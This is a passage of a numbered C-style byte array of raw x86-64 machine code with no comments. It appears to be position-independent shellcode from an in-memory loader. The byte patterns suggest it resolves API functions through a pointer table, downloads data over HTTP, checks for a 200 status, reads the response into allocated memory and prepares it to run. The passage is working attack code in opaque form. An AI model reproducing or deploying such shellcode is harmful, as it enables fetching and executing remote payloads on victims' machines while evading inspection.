469 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x8b, 0x4d, 0x20,
470 0x48, 0x8b, 0x55, 0x18, 0x49, 0x89, 0xc9, 0x49, 0x89, 0xd0, 0x48, 0x89,
471 0xc2, 0x48, 0x8b, 0x4d, 0x10, 0xe8, 0x72, 0xfb, 0xff, 0xff, 0x48, 0x89,
472 0x45, 0xf0, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48, 0x89, 0x45,
473 0xf8, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x85, 0xc0,
474 0x74, 0x07, 0x48, 0x83, 0x7d, 0xf0, 0x00, 0x74, 0xbb, 0x48, 0x8b, 0x45,
475 0xf0, 0x48, 0x83, 0xc4, 0x50, 0x5d, 0xc3, 0x55, 0x56, 0x53, 0x48, 0x81,
476 0xec, 0xd0, 0x03, 0x00, 0x00, 0x48, 0x8d, 0xac, 0x24, 0x80, 0x00, 0x00,
477 0x00, 0x48, 0x89, 0x8d, 0x70, 0x03, 0x00, 0x00, 0x48, 0xc7, 0x85, 0x48,
478 0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x85, 0xe0, 0x02, 0x00,
479 0x00, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x85, 0x44, 0x03, 0x00, 0x00, 0x00,
480 0x00, 0x00, 0x00, 0xc7, 0x85, 0x3c, 0x03, 0x00, 0x00, 0x00, 0x00, 0x00,
481 0x00, 0xc7, 0x85, 0x38, 0x03, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x48,
482 0x8b, 0x85, 0x70, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xf8, 0x01, 0x00,
483 0x00, 0x48, 0x89, 0x85, 0x30, 0x03, 0x00, 0x00, 0xc7, 0x85, 0x40, 0x03,
484 0x00, 0x00, 0x00, 0x03, 0x60, 0x04, 0x48, 0x8d, 0x85, 0x70, 0x02, 0x00,
485 0x00, 0x41, 0xb8, 0x68, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00,
486 0x48, 0x89, 0xc1, 0xe8, 0xd8, 0x4d, 0x00, 0x00, 0xc7, 0x85, 0x70, 0x02,
487 0x00, 0x00, 0x68, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x85, 0x60, 0x01, 0x00,
488 0x00, 0x48, 0x89, 0x85, 0x88, 0x02, 0x00, 0x00, 0xc7, 0x85, 0x90, 0x02,
489 0x00, 0x00, 0x04, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x45, 0x50, 0x48, 0x89,
490 0x85, 0xb8, 0x02, 0x00, 0x00, 0xc7, 0x85, 0xc0, 0x02, 0x00, 0x00, 0x04,
491 0x01, 0x00, 0x00, 0x48, 0x8d, 0x45, 0x10, 0x48, 0x89, 0x85, 0x98, 0x02,
492 0x00, 0x00, 0xc7, 0x85, 0xa0, 0x02, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00,
493 0x48, 0x8d, 0x45, 0xd0, 0x48, 0x89, 0x85, 0xa8, 0x02, 0x00, 0x00, 0xc7,
494 0x85, 0xb0, 0x02, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85,
495 0x70, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x20, 0x01, 0x00, 0x00, 0x48,
496 0x8b, 0x95, 0x70, 0x03, 0x00, 0x00, 0x48, 0x8d, 0x8a, 0xf8, 0x08, 0x00,
497 0x00, 0x48, 0x8d, 0x95, 0x70, 0x02, 0x00, 0x00, 0x49, 0x89, 0xd1, 0x41,
498 0xb8, 0x00, 0x00, 0x00, 0x10, 0xba, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0,
499 0x85, 0xc0, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9, 0x89, 0x07,
500 0x00, 0x00, 0x8b, 0x85, 0x84, 0x02, 0x00, 0x00, 0x83, 0xf8, 0x04, 0x0f,
501 0x94, 0xc0, 0x0f, 0xb6, 0xc0, 0x89, 0x85, 0x3c, 0x03, 0x00, 0x00, 0x83,
502 0xbd, 0x3c, 0x03, 0x00, 0x00, 0x00, 0x74, 0x1d, 0x81, 0x8d, 0x40, 0x03,
503 0x00, 0x00, 0x00, 0x00, 0x80, 0x00, 0x83, 0xbd, 0x38, 0x03, 0x00, 0x00,
504 0x00, 0x74, 0x0a, 0x81, 0x8d, 0x40, 0x03, 0x00, 0x00, 0x00, 0x30, 0x00,
505 0x00, 0x48, 0x8b, 0x85, 0x70, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x28,
506 0x01, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x20, 0x00, 0x00, 0x00, 0x00, 0x41,
507 0xb9, 0x00, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xba,
508 0x00, 0x00, 0x00, 0x00, 0xb9, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48,
509 0x89, 0x85, 0x28, 0x03, 0x00, 0x00, 0x48, 0x83, 0xbd, 0x28, 0x03, 0x00,
510 0x00, 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9, 0x05, 0x07,
511 0x00, 0x00, 0x48, 0x8b, 0x85, 0x70, 0x03, 0x00, 0x00, 0x4c, 0x8b, 0x90,
512 0x30, 0x01, 0x00, 0x00, 0x0f, 0xb7, 0x85, 0x94, 0x02, 0x00, 0x00, 0x0f,
513 0xb7, 0xc8, 0x48, 0x8d, 0x95, 0x60, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85,
514 0x28, 0x03, 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24, 0x38, 0x00, 0x00, 0x00,
515 0x00, 0xc7, 0x44, 0x24, 0x30, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24,
516 0x28, 0x03, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24, 0x20, 0x00, 0x00,
517 0x00, 0x00, 0x41, 0xb9, 0x00, 0x00, 0x00, 0x00, 0x41, 0x89, 0xc8, 0x48,
518 0x89, 0xc1, 0x41, 0xff, 0xd2, 0x48, 0x89, 0x85, 0x20, 0x03, 0x00, 0x00,
519 0x48, 0x83, 0xbd, 0x20, 0x03, 0x00, 0x00, 0x00, 0x0f, 0x84, 0xba, 0x05,
520 0x00, 0x00, 0x8b, 0x85, 0xc0, 0x02, 0x00, 0x00, 0x85, 0xc0, 0x75, 0x08,
521 0xc6, 0x45, 0x50, 0x2f, 0xc6, 0x45, 0x51, 0x00, 0x48, 0x8b, 0x85, 0x70,
522 0x03, 0x00, 0x00, 0x4c, 0x8b, 0x90, 0x58, 0x01, 0x00, 0x00, 0x48, 0x8d,
523 0x4d, 0x50, 0x48, 0x8b, 0x85, 0x20, 0x03, 0x00, 0x00, 0x48, 0xc7, 0x44,
524 0x24, 0x38, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x95, 0x40, 0x03, 0x00, 0x00,
525 0x89, 0x54, 0x24, 0x30, 0x48, 0xc7, 0x44, 0x24, 0x28, 0x00, 0x00, 0x00,
526 0x00, 0x48, 0xc7, 0x44, 0x24, 0x20, 0x00, 0x00, 0x00, 0x00, 0x41, 0xb9,
527 0x00, 0x00, 0x00, 0x00, 0x49, 0x89, 0xc8, 0xba, 0x00, 0x00, 0x00, 0x00,
528 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd2, 0x48, 0x89, 0x85, 0x18, 0x03, 0x00,
529 0x00, 0x48, 0x83, 0xbd, 0x18, 0x03, 0x00, 0x00, 0x00, 0x0f, 0x84, 0x27,
530 0x05, 0x00, 0x00, 0x83, 0xbd, 0x3c, 0x03, 0x00, 0x00, 0x00, 0x74, 0x53,
531 0x8b, 0x85, 0x40, 0x03, 0x00, 0x00, 0x25, 0x00, 0x10, 0x00, 0x00, 0x85,
532 0xc0, 0x74, 0x44, 0xc7, 0x85, 0x14, 0x03, 0x00, 0x00, 0x04, 0x00, 0x00,
533 0x00, 0xc7, 0x85, 0xec, 0x02, 0x00, 0x00, 0x80, 0x33, 0x00, 0x00, 0x48,
534 0x8b, 0x85, 0x70, 0x03, 0x00, 0x00, 0x4c, 0x8b, 0x90, 0x38, 0x01, 0x00,
535 0x00, 0x48, 0x8d, 0x95, 0xec, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x18,
536 0x03, 0x00, 0x00, 0x41, 0xb9, 0x04, 0x00, 0x00, 0x00, 0x49, 0x89, 0xd0,
537 0xba, 0x1f, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd2, 0x8b,
538 0x85, 0xa0, 0x02, 0x00, 0x00, 0x85, 0xc0, 0x74, 0x39, 0x48, 0x8b, 0x85,
539 0x70, 0x03, 0x00, 0x00, 0x4c, 0x8b, 0x90, 0x38, 0x01, 0x00, 0x00, 0x8b,
540 0x8d, 0xa0, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x95, 0x98, 0x02, 0x00, 0x00,
541 0x48, 0x8b, 0x85, 0x18, 0x03, 0x00, 0x00, 0x41, 0x89, 0xc9, 0x49, 0x89,
542 0xd0, 0xba, 0x1c, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd2,
543 0x89, 0x85, 0x44, 0x03, 0x00, 0x00, 0x8b, 0x85, 0xb0, 0x02, 0x00, 0x00,
544 0x85, 0xc0, 0x74, 0x39, 0x48, 0x8b, 0x85, 0x70, 0x03, 0x00, 0x00, 0x4c,
545 0x8b, 0x90, 0x38, 0x01, 0x00, 0x00, 0x8b, 0x8d, 0xb0, 0x02, 0x00, 0x00,
546 0x48, 0x8b, 0x95, 0xa8, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x18, 0x03,
547 0x00, 0x00, 0x41, 0x89, 0xc9, 0x49, 0x89, 0xd0, 0xba, 0x1d, 0x00, 0x00,
548 0x00, 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd2, 0x89, 0x85, 0x44, 0x03, 0x00,
549 0x00, 0x48, 0x8b, 0x85, 0x70, 0x03, 0x00, 0x00, 0x4c, 0x8b, 0x90, 0x60,
550 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x18, 0x03, 0x00, 0x00, 0xc7, 0x44,
551 0x24, 0x20, 0x00, 0x00, 0x00, 0x00, 0x41, 0xb9, 0x00, 0x00, 0x00, 0x00,
552 0x41, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x48,
553 0x89, 0xc1, 0x41, 0xff, 0xd2, 0x85, 0xc0, 0x0f, 0x84, 0xe8, 0x02, 0x00,
554 0x00, 0xc7, 0x85, 0xe4, 0x02, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0xc7,
555 0x85, 0xe0, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85,
556 0x70, 0x03, 0x00, 0x00, 0x4c, 0x8b, 0x90, 0x68, 0x01, 0x00, 0x00, 0x48,
557 0x8d, 0x8d, 0xe4, 0x02, 0x00, 0x00, 0x48, 0x8d, 0x95, 0xe0, 0x02, 0x00,
558 0x00, 0x48, 0x8b, 0x85, 0x18, 0x03, 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24,
559 0x20, 0x00, 0x00, 0x00, 0x00, 0x49, 0x89, 0xc9, 0x49, 0x89, 0xd0, 0xba,
560 0x13, 0x00, 0x00, 0x20, 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd2, 0x85, 0xc0,
561 0x0f, 0x84, 0x8f, 0x02, 0x00, 0x00, 0x8b, 0x85, 0xe0, 0x02, 0x00, 0x00,
562 0x3d, 0xc8, 0x00, 0x00, 0x00, 0x0f, 0x85, 0x7e, 0x02, 0x00, 0x00, 0xc7,
563 0x85, 0xe4, 0x02, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0xc7, 0x85, 0xf0,
564 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x70, 0x03,
565 0x00, 0x00, 0x4c, 0x8b, 0x90, 0x68, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x8d,
566 0xe4, 0x02, 0x00, 0x00, 0x48, 0x8d, 0x95, 0xf0, 0x02, 0x00, 0x00, 0x48,
567 0x8b, 0x85, 0x18, 0x03, 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24, 0x20, 0x00,
568 0x00, 0x00, 0x00, 0x49, 0x89, 0xc9, 0x49, 0x89, 0xd0, 0xba, 0x05, 0x00,
569 0x00, 0x20, 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd2, 0x89, 0x85, 0x10, 0x03,
570 0x00, 0x00, 0x83, 0xbd, 0x10, 0x03, 0x00, 0x00, 0x00, 0x0f, 0x85, 0x80,
571 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x70, 0x03, 0x00, 0x00, 0x48, 0x8b,
572 0x80, 0xc8, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x3d, 0x76, 0x2f, 0x00, 0x00,
573 0x0f, 0x85, 0xff, 0x01, 0x00, 0x00, 0xc7, 0x85, 0xf0, 0x02, 0x00, 0x00,
574 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x70, 0x03, 0x00, 0x00, 0x4c,
575 0x8b, 0x90, 0x50, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x95, 0xf4, 0x02, 0x00,
576 0x00, 0x48, 0x8b, 0x85, 0x18, 0x03, 0x00, 0x00, 0x41, 0xb9, 0x00, 0x00,
577 0x00, 0x00, 0x41, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0x41,
578 0xff, 0xd2, 0x89, 0x85, 0x10, 0x03, 0x00, 0x00, 0x83, 0xbd, 0x10, 0x03,
579 0x00, 0x00, 0x00, 0x0f, 0x84, 0xb4, 0x01, 0x00, 0x00, 0x8b, 0x85, 0xf4,
580 0x02, 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x84, 0xa6, 0x01, 0x00, 0x00, 0x48,
581 0x83, 0xbd, 0x48, 0x03, 0x00, 0x00, 0x00, 0x75, 0x49, 0x48, 0x8b, 0x85,
582 0x70, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x98, 0xa8, 0x00, 0x00, 0x00, 0x8b,
583 0x85, 0xf4, 0x02, 0x00, 0x00, 0x89, 0xc6, 0x48, 0x8b, 0x85, 0x70, 0x03,
584 0x00, 0x00, 0x48, 0x8b, 0x80, 0xb8, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x49,
585 0x89, 0xf0, 0xba, 0x01, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xff, 0xd3,
586 0x48, 0x89, 0x85, 0x48, 0x03, 0x00, 0x00, 0x48, 0x83, 0xbd, 0x48, 0x03,
587 0x00, 0x00, 0x00, 0x75, 0x5f, 0xe9, 0x53, 0x01, 0x00, 0x00, 0x48, 0x8b,
588 0x85, 0x70, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x98, 0xb0, 0x00, 0x00, 0x00,
589 0x8b, 0x95, 0xf0, 0x02, 0x00, 0x00, 0x8b, 0x85, 0xf4, 0x02, 0x00, 0x00,
590 0x01, 0xd0, 0x89, 0xc6, 0x48, 0x8b, 0x85, 0x70, 0x03, 0x00, 0x00, 0x48,
591 0x8b, 0x80, 0xb8, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x8b, 0x95, 0x48,
592 0x03, 0x00, 0x00, 0x49, 0x89, 0xf1, 0x49, 0x89, 0xd0, 0xba, 0x01, 0x00,
593 0x00, 0x00, 0x48, 0x89, 0xc1, 0xff, 0xd3, 0x48, 0x89, 0x85, 0x48, 0x03,
594 0x00, 0x00, 0x48, 0x83, 0xbd, 0x48, 0x03, 0x00, 0x00, 0x00, 0x0f, 0x84,
595 0xf8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x70, 0x03, 0x00, 0x00, 0x4c,
596 0x8b, 0x90, 0x40, 0x01, 0x00, 0x00, 0x8b, 0x8d, 0xf4, 0x02, 0x00, 0x00,
597 0x8b, 0x85, 0xf0, 0x02, 0x00, 0x00, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0x48,
598 0x03, 0x00, 0x00, 0x48, 0x01, 0xc2, 0x4c, 0x8d, 0x85, 0xe8, 0x02, 0x00,
599 0x00, 0x48, 0x8b, 0x85, 0x18, 0x03, 0x00, 0x00, 0x4d, 0x89, 0xc1, 0x41,
600 0x89, 0xc8, 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd2, 0x89, 0x85, 0x10, 0x03,
601 0x00, 0x00, 0x8b, 0x95, 0xf0, 0x02, 0x00, 0x00, 0x8b, 0x85, 0xf4, 0x02,
602 0x00, 0x00, 0x01, 0xd0, 0x89, 0x85, 0xf0, 0x02, 0x00, 0x00, 0xe9, 0xa5,
603 0xfe, 0xff, 0xff, 0x8b, 0x85, 0xf0, 0x02, 0x00, 0x00, 0x85, 0xc0, 0x0f,
604 0x84, 0x8c, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x70, 0x03, 0x00, 0x00,
605 0x48, 0x8b, 0x98, 0xa8, 0x00, 0x00, 0x00, 0x8b, 0x85, 0xf0, 0x02, 0x00,
606 0x00, 0x89, 0xc6, 0x48, 0x8b, 0x85, 0x70, 0x03, 0x00, 0x00, 0x48, 0x8b,
607 0x80, 0xb8, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x49, 0x89, 0xf0, 0xba, 0x01,
608 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xff, 0xd3, 0x48, 0x89, 0x85, 0x48,
609 0x03, 0x00, 0x00, 0x48, 0x83, 0xbd, 0x48, 0x03, 0x00, 0x00, 0x00, 0x74,
610 0x48, 0xc7, 0x85, 0xe8, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48,
611 0x8b, 0x85, 0x70, 0x03, 0x00, 0x00, 0x4c, 0x8b, 0x90, 0x40, 0x01, 0x00,
612 0x00, 0x8b, 0x8d, 0xf0, 0x02, 0x00, 0x00, 0x4c, 0x8d, 0x85, 0xe8, 0x02,
613 0x00, 0x00, 0x48, 0x8b, 0x95, 0x48, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x85,
614 0x18, 0x03, 0x00, 0x00, 0x4d, 0x89, 0xc1, 0x41, 0x89, 0xc8, 0x48, 0x89,
615 0xc1, 0x41, 0xff, 0xd2, 0x89, 0x85, 0x44, 0x03, 0x00, 0x00, 0xeb, 0x01,
616 0x90, 0x48, 0x83, 0xbd, 0x48, 0x03, 0x00, 0x00, 0x00, 0x0f, 0x84, 0xf9,
617 0x00, 0x00, 0x00, 0x8b, 0x85, 0xf0, 0x02, 0x00, 0x00, 0x85, 0xc0, 0x0f,
618 0x84, 0xeb, 0x00, 0x00, 0x00, 0x8b, 0x85, 0xf0, 0x02, 0x00, 0x00, 0x89,
619 0xc0, 0x48, 0x89, 0x45, 0xc8, 0x48, 0x8b, 0x85, 0x70, 0x03, 0x00, 0x00,
620 0x48, 0x05, 0x30, 0x0d, 0x00, 0x00, 0x48, 0x8d, 0x4d, 0xc8, 0x48, 0x8b,
621 0x95, 0x30, 0x03, 0x00, 0x00, 0x48, 0x89, 0x54, 0x24, 0x30, 0xc7, 0x44,
622 0x24, 0x28, 0x04, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x20, 0x00, 0x30,
623 0x00, 0x00, 0x49, 0x89, 0xc9, 0x41, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x48,
624 0x89, 0xc2, 0x48, 0xc7, 0xc1, 0xff, 0xff, 0xff, 0xff, 0xe8, 0xb5, 0x4f,
625 0x00, 0x00, 0x89, 0x85, 0x0c, 0x03, 0x00, 0x00, 0x83, 0xbd, 0x0c, 0x03,
626 0x00, 0x00, 0x00, 0x78, 0x32, 0x8b, 0x8d, 0xf0, 0x02, 0x00, 0x00, 0x48,
627 0x8b, 0x85, 0x70, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x30, 0x0d, 0x00,
628 0x00, 0x48, 0x8b, 0x95, 0x48, 0x03, 0x00, 0x00, 0x41, 0x89, 0xc8, 0x48,
629 0x89, 0xc1, 0xe8, 0x69, 0x47, 0x00, 0x00, 0xc7, 0x85, 0x44, 0x03, 0x00,
630 0x00, 0x01, 0x00, 0x00, 0x00, 0xeb, 0x0a, 0xc7, 0x85, 0x44, 0x03, 0x00,
631 0x00, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x95, 0xf0, 0x02, 0x00, 0x00, 0x48,
632 0x8b, 0x85, 0x48, 0x03, 0x00, 0x00, 0x41, 0x89, 0xd0, 0xba, 0x00, 0x00,
633 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0xf2, 0x46, 0x00, 0x00, 0x48, 0x8b,
634 0x85, 0x70, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x98, 0xc0, 0x00, 0x00, 0x00,
635 0x48, 0x8b, 0x85, 0x70, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xb8, 0x00,
636 0x00, 0x00, 0xff, 0xd0, 0x48, 0x8b, 0x95, 0x48, 0x03, 0x00, 0x00, 0x49,
637 0x89, 0xd0, 0xba, 0x01, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xff, 0xd3,
638 0x48, 0x8b, 0x85, 0x70, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x90, 0x48, 0x01,
639 0x00, 0x00, 0x48, 0x8b, 0x85, 0x18, 0x03, 0x00, 0x00, 0x48, 0x89, 0xc1,
640 0xff, 0xd2, 0x48, 0x8b, 0x85, 0x70, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x90,
641 0x48, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x20, 0x03, 0x00, 0x00, 0x48,
642 0x89, 0xc1, 0xff, 0xd2, 0x48, 0x8b, 0x85, 0x70, 0x03, 0x00, 0x00, 0x48,
643 0x8b, 0x90, 0x48, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x28, 0x03, 0x00,
644 0x00, 0x48, 0x89, 0xc1, 0xff, 0xd2, 0x83, 0xbd, 0x44, 0x03, 0x00, 0x00,
645 0x00, 0x0f, 0x84, 0xb2, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x70, 0x03,
646 0x00, 0x00, 0x8b, 0x80, 0x04, 0x02, 0x00, 0x00, 0x83, 0xf8, 0x03, 0x0f,
647 0x85, 0x9c, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x70, 0x03, 0x00, 0x00,
648 0x48, 0x8b, 0x80, 0x30, 0x0d, 0x00, 0x00, 0x48, 0x89, 0x85, 0x00, 0x03,
649 0x00, 0x00, 0x48, 0x8b, 0x85, 0x70, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x80,
650 0x28, 0x0d, 0x00, 0x00, 0x41, 0x89, 0xc0, 0x48, 0x8b, 0x85, 0x70, 0x03,
651 0x00, 0x00, 0x48, 0x8d, 0x90, 0x18, 0x0d, 0x00, 0x00, 0x48, 0x8b, 0x85,
652 0x70, 0x03, 0x00, 0x00, 0x48, 0x05, 0x08, 0x0d, 0x00, 0x00, 0x48, 0x8b,
653 0x8d, 0x00, 0x03, 0x00, 0x00, 0x45, 0x89, 0xc1, 0x49, 0x89, 0xc8, 0x48,
654 0x89, 0xc1, 0xe8, 0x45, 0x53, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x70, 0x03,
655 0x00, 0x00, 0x48, 0x8b, 0x40, 0x28, 0x48, 0x8b, 0x95, 0x70, 0x03, 0x00,
656 0x00, 0x48, 0x8d, 0x8a, 0x00, 0x0c, 0x00, 0x00, 0x48, 0x89, 0xc2, 0xe8,
657 0x05, 0x50, 0x00, 0x00, 0x48, 0x89, 0x85, 0xf8, 0x02, 0x00, 0x00, 0x48,
658 0x8b, 0x85, 0x00, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x18, 0x05, 0x00,
659 0x00, 0x48, 0x39, 0x85, 0xf8, 0x02, 0x00, 0x00, 0x74, 0x07, 0xb8, 0x00,
660 0x00, 0x00, 0x00, 0xeb, 0x06, 0x8b, 0x85, 0x44, 0x03, 0x00, 0x00, 0x48,
661 0x81, 0xc4, 0xd0, 0x03, 0x00, 0x00, 0x5b, 0x5e, 0x5d, 0xc3, 0x55, 0x48,
662 0x81, 0xec, 0x70, 0x02, 0x00, 0x00, 0x48, 0x8d, 0xac, 0x24, 0x80, 0x00,
663 0x00, 0x00, 0x48, 0x89, 0x8d, 0x00, 0x02, 0x00, 0x00, 0x48, 0x89, 0x95,
664 0x08, 0x02, 0x00, 0x00, 0x4c, 0x89, 0x85, 0x10, 0x02, 0x00, 0x00, 0xc7,
665 0x85, 0xec, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x85, 0xe4,
666 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x00, 0x02,
667 0x00, 0x00, 0x48, 0x8b, 0x80, 0x78, 0x01, 0x00, 0x00, 0x48, 0x85, 0xc0,
668 0x0f, 0x84, 0x7c, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x00, 0x02, 0x00,
669 0x00, 0x48, 0x8b, 0x80, 0x78, 0x01, 0x00, 0x00, 0x4c, 0x8b, 0x85, 0x10,
670 0x02, 0x00, 0x00, 0x48, 0x8b, 0x95, 0x00, 0x02, 0x00, 0x00, 0x48, 0x81,
671 0xc2, 0x34, 0x08, 0x00, 0x00, 0x48, 0x8b, 0x8d, 0x00, 0x02, 0x00, 0x00,
672 0x48, 0x81, 0xc1, 0x24, 0x08, 0x00, 0x00, 0xff, 0xd0, 0x89, 0x85, 0xec,
673 0x01, 0x00, 0x00, 0x83, 0xbd, 0xec, 0x01, 0x00, 0x00, 0x00, 0x0f, 0x88,
674 0x28, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x08, 0x02, 0x00, 0x00, 0x48,
675 0x83, 0xc0, 0x0c, 0x48, 0x8d, 0x55, 0xb0, 0x49, 0x89, 0xd0, 0x48, 0x89,
676 0xc2, 0x48, 0x8b, 0x8d, 0x00, 0x02, 0x00, 0x00, 0xe8, 0xa4, 0xeb, 0xff,
677 0xff, 0x48, 0x8b, 0x85, 0x10, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48,
678 0x8b, 0x00, 0x4c, 0x8b, 0x50, 0x18, 0x48, 0x8b, 0x85, 0x10, 0x02, 0x00,
679 0x00, 0x4c, 0x8d, 0x40, 0x08, 0x48, 0x8b, 0x85, 0x00, 0x02, 0x00, 0x00,
680 0x48, 0x8d, 0x88, 0x44, 0x08, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x10, 0x02,
681 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x55, 0xb0, 0x4d, 0x89, 0xc1,
682 0x49, 0x89, 0xc8, 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd2, 0x89, 0x85, 0xec,
683 0x01, 0x00, 0x00, 0x83, 0xbd, 0xec, 0x01, 0x00, 0x00, 0x00, 0x0f, 0x88,
684 0x9f, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x10, 0x02, 0x00, 0x00, 0x48,
685 0x8b, 0x40, 0x08, 0x48, 0x8b, 0x00, 0x4c, 0x8b, 0x40, 0x50, 0x48, 0x8b,
686 0x85, 0x10, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x08, 0x48, 0x8d, 0x95,
687 0xbc, 0x01, 0x00, 0x00, 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd0, 0x89, 0x85,
688 0xec, 0x01, 0x00, 0x00, 0x83, 0xbd, 0xec, 0x01, 0x00, 0x00, 0x00, 0x0f,
689 0x88, 0x81, 0x00, 0x00, 0x00, 0x8b, 0x85, 0xbc, 0x01, 0x00, 0x00, 0x85,
690 0xc0, 0x74, 0x77, 0x48, 0x8b, 0x85, 0x10, 0x02, 0x00, 0x00, 0x48, 0x8b,
691 0x40, 0x08, 0x48, 0x8b, 0x00, 0x4c, 0x8b, 0x50, 0x48, 0x48, 0x8b, 0x85,
692 0x10, 0x02, 0x00, 0x00, 0x4c, 0x8d, 0x40, 0x10, 0x48, 0x8b, 0x85, 0x00,
693 0x02, 0x00, 0x00, 0x48, 0x8d, 0x88, 0x64, 0x08, 0x00, 0x00, 0x48, 0x8b,
694 0x85, 0x00, 0x02, 0x00, 0x00, 0x48, 0x8d, 0x90, 0x54, 0x08, 0x00, 0x00,
695 0x48, 0x8b, 0x85, 0x10, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x08, 0x4d,
696 0x89, 0xc1, 0x49, 0x89, 0xc8, 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd2, 0x89,
697 0x85, 0xec, 0x01, 0x00, 0x00, 0xeb, 0x1f, 0x48, 0x8b, 0x85, 0x10, 0x02,
698 0x00, 0x00, 0x48, 0xc7, 0x40, 0x08, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x0e,
699 0x48, 0x8b, 0x85, 0x10, 0x02, 0x00, 0x00, 0x48, 0xc7, 0x00, 0x00, 0x00,
700 0x00, 0x00, 0x83, 0xbd, 0xec, 0x01, 0x00, 0x00, 0x00, 0x78, 0x13, 0x48,
